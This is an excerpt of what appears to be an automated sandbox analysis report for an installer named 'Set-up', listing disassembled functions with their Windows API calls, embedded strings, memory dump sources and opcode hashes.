                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: !!p$!af_$!af_ && i<s_$datavect<unsigned long *>::at$ncvector<unsigned long>::attach_back
                                                                                                                                  • API String ID: 2281437974-3312955937
                                                                                                                                  • Opcode ID: ea808afeffe2367e95cf92514f0b6b51a44b5c24066a48ffb64718c21a6c7efb
                                                                                                                                  • Instruction ID: 42cd9e127180edd17070e07636d5cbc0511d18dfe5d01062683bb4008a6e0a18
                                                                                                                                  • Opcode Fuzzy Hash: ea808afeffe2367e95cf92514f0b6b51a44b5c24066a48ffb64718c21a6c7efb
                                                                                                                                  • Instruction Fuzzy Hash: C041D171A44704EFCB20EF49D841B5AFBF4EB45728F10466EE819A77C0D771A940CB90
                                                                                                                                  Function 00E61D70 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E61DAA
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E61F37
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E61EDD, 00E61F05
                                                                                                                                  • datavect<struct SshClient::BvConsole::CaptureEntry *>::operator [], xrefs: 00E61EEC
                                                                                                                                  • ncvector<struct SshClient::BvConsole::CaptureEntry>::operator [], xrefs: 00E61F00
                                                                                                                                  • datavect<struct SshClient::BvConsole::CaptureEntry *>::size, xrefs: 00E61ED8
                                                                                                                                  • !af_ && i<s_, xrefs: 00E61EF1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$BufferConsoleEnterInfoLeaveScreen
                                                                                                                                  • String ID: !af_$!af_ && i<s_$datavect<struct SshClient::BvConsole::CaptureEntry *>::operator []$datavect<struct SshClient::BvConsole::CaptureEntry *>::size$ncvector<struct SshClient::BvConsole::CaptureEntry>::operator []
                                                                                                                                  • API String ID: 2027140841-2732337431
                                                                                                                                  • Opcode ID: 7d1322ad2058ed147faaa1c9bce2d97e1cbf0e0b454beca41613ae8076379b6d
                                                                                                                                  • Instruction ID: 7087b49940e0578b3903b96074952e316ea5909835f8af88db2422bf993e6d9c
                                                                                                                                  • Opcode Fuzzy Hash: 7d1322ad2058ed147faaa1c9bce2d97e1cbf0e0b454beca41613ae8076379b6d
                                                                                                                                  • Instruction Fuzzy Hash: 15416431A81284DFCB36CB54F845B69F7B9EB15398F08219AEC1077289C771EA45C7A1
                                                                                                                                  Function 00E51F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,460C02D8,00000000), ref: 00E51F64
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000000,00000000,00000000,00000001,?,?,?,00000000,00000000,00000000,460C02D8,00000000), ref: 00E51F72
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51FA1
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,00000001,?,?,?,00000000,00000000,00000000,460C02D8,00000000), ref: 00E5202F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E52066
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FullNamePath$Concurrency::cancel_current_taskErrorExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: GetFullPathName()
                                                                                                                                  • API String ID: 1515775718-2043017871
                                                                                                                                  • Opcode ID: eb17545ae7ce698bf05b42954f238041379b34034711e30cb7401d6c4812569b
                                                                                                                                  • Instruction ID: 396421e3f25647f91eb5ec179e439a0925de04e8eb47cca8253ddab84cf73d67
                                                                                                                                  • Opcode Fuzzy Hash: eb17545ae7ce698bf05b42954f238041379b34034711e30cb7401d6c4812569b
                                                                                                                                  • Instruction Fuzzy Hash: 33312471600205ABCB24EF64CC41B6FB7F8EF84744F10492DF915A32C0DBB4A848CB90
                                                                                                                                  Function 00E62844 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E63B10: EnterCriticalSection.KERNEL32(0131BA1C,460C02D8,?,?,?,?,?,00000000,011679C8,000000FF,?,00E62830,00000001,00000011,460C02D8,00002510), ref: 00E63B81
                                                                                                                                    • Part of subcall function 00E63B10: LeaveCriticalSection.KERNEL32(0131BA1C,?,?,?,?,?,00000000,011679C8,000000FF,?,00E62830,00000001,00000011,460C02D8,00002510,0000250C), ref: 00E63BD5
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6284D
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                    • Part of subcall function 00E63A10: EnterCriticalSection.KERNEL32(0131BA1C,460C02D8), ref: 00E63A8D
                                                                                                                                    • Part of subcall function 00E63A10: LeaveCriticalSection.KERNEL32(0131BA1C,000000FF,?,0131BA48,00000001,0131B9B8,00000000), ref: 00E63AFB
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,0131B8F8,00000000,460C02D8), ref: 00E6295D
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E62946
                                                                                                                                  • datavect<struct SshClient::Console::OutParam *>::operator [], xrefs: 00E6292D
                                                                                                                                  • ncvector<struct SshClient::Console::OutParam>::operator [], xrefs: 00E62941
                                                                                                                                  • !af_ && i<s_, xrefs: 00E62932
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter$ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: !af_$!af_ && i<s_$datavect<struct SshClient::Console::OutParam *>::operator []$ncvector<struct SshClient::Console::OutParam>::operator []
                                                                                                                                  • API String ID: 1941180888-1306365089
                                                                                                                                  • Opcode ID: a6c641c4c191c6c0cceb388114c21708d194e93bf5d8a5ac7853dc3fc29e2d75
                                                                                                                                  • Instruction ID: 7433b0d309b6693a1c2235a84dd0476f621fe414d84b7e80d365d8034b4f47e1
                                                                                                                                  • Opcode Fuzzy Hash: a6c641c4c191c6c0cceb388114c21708d194e93bf5d8a5ac7853dc3fc29e2d75
                                                                                                                                  • Instruction Fuzzy Hash: 2B312430A80A48AEDF21DF64EC41BAEB7F8EF90794F10552DF911732C2CB706A058761
                                                                                                                                  Function 00E51DE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000000,00000000,460C02D8), ref: 00E51E1E
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E51E2C
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51E55
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetTempPathW.KERNEL32(00000000,00000000,00000001,?,?), ref: 00E51EDC
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E51F12
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PathTemp$Concurrency::cancel_current_taskErrorExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: GetTempPath()
                                                                                                                                  • API String ID: 2063755193-631742751
                                                                                                                                  • Opcode ID: 662888edbc873b65f6c33da7e81f0f5875592f06a485a30d6e57e61ba2476967
                                                                                                                                  • Instruction ID: bd5ec0c9e7ccbdc5c6636a570a0607b886d1c722bf831617c59f61e772abbf95
                                                                                                                                  • Opcode Fuzzy Hash: 662888edbc873b65f6c33da7e81f0f5875592f06a485a30d6e57e61ba2476967
                                                                                                                                  • Instruction Fuzzy Hash: C231F4716006059BCB24EF68CC56B6FB7F9EF84B15F10492EE915A7280DFB5A8088791
                                                                                                                                  Function 00E7B3C0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E7B427
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: !!p$!af_$!af_ && i<s_$datavect<struct UpdateInfo *>::at$ncvector<struct UpdateInfo>::attach_back
                                                                                                                                  • API String ID: 2281437974-43309490
                                                                                                                                  • Opcode ID: b6dfb1ad63c38ffe407457dd93dbf4f94eeabd981d95ec286f9a4c93825b1847
                                                                                                                                  • Instruction ID: 4edbc91935410cc6fbb544e3fb2bcd2295f48e42dc8c1d43b0fe2ecc3f911953
                                                                                                                                  • Opcode Fuzzy Hash: b6dfb1ad63c38ffe407457dd93dbf4f94eeabd981d95ec286f9a4c93825b1847
                                                                                                                                  • Instruction Fuzzy Hash: 1A31E571604204DFCB24DF54D881B6DF7F4EF44724F10926AE829AF2C6EB71A900CB61
                                                                                                                                  Function 00E70380 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E703E7
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: !!p$!af_$!af_ && i<s_$datavect<struct WWLib::RegItem *>::at$ncvector<struct WWLib::RegItem>::attach_back
                                                                                                                                  • API String ID: 2281437974-2121110380
                                                                                                                                  • Opcode ID: 2992c794f9f0984e642098cf96f500dee84cc1acadf6302a7774abd726090eb7
                                                                                                                                  • Instruction ID: d97793e5d0fc86bbf707bd68255f7782a92595c3328f621c808a159089404336
                                                                                                                                  • Opcode Fuzzy Hash: 2992c794f9f0984e642098cf96f500dee84cc1acadf6302a7774abd726090eb7
                                                                                                                                  • Instruction Fuzzy Hash: 9031E371600204DFCB24DF54D981B9AF7F4FB54320F10966AE929AB3C5EB71AD00CB61
                                                                                                                                  Function 0112D095 Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0112CDDC: _free.LIBCMT ref: 0112CE05
                                                                                                                                  • _free.LIBCMT ref: 0112D0E3
                                                                                                                                    • Part of subcall function 01126F59: HeapFree.KERNEL32(00000000,00000000,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?), ref: 01126F6F
                                                                                                                                    • Part of subcall function 01126F59: GetLastError.KERNEL32(?,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?,?), ref: 01126F81
                                                                                                                                  • _free.LIBCMT ref: 0112D0EE
                                                                                                                                  • _free.LIBCMT ref: 0112D0F9
                                                                                                                                  • _free.LIBCMT ref: 0112D14D
                                                                                                                                  • _free.LIBCMT ref: 0112D158
                                                                                                                                  • _free.LIBCMT ref: 0112D163
                                                                                                                                  • _free.LIBCMT ref: 0112D16E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 3416b74a0895299f2957c68b9f2b763de3de6214ce0b0644f2df9369b365a1ec
                                                                                                                                  • Instruction ID: 57b4790a945562a711167ae76158b0c531d64b8001324d5c5fdc8165e5b0d593
                                                                                                                                  • Opcode Fuzzy Hash: 3416b74a0895299f2957c68b9f2b763de3de6214ce0b0644f2df9369b365a1ec
                                                                                                                                  • Instruction Fuzzy Hash: 24118472980B29AADB28B7B0DC05FCF7BAC5F50704F400C18E79D6A090D774F92486D1
                                                                                                                                  Function 00EC9250 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
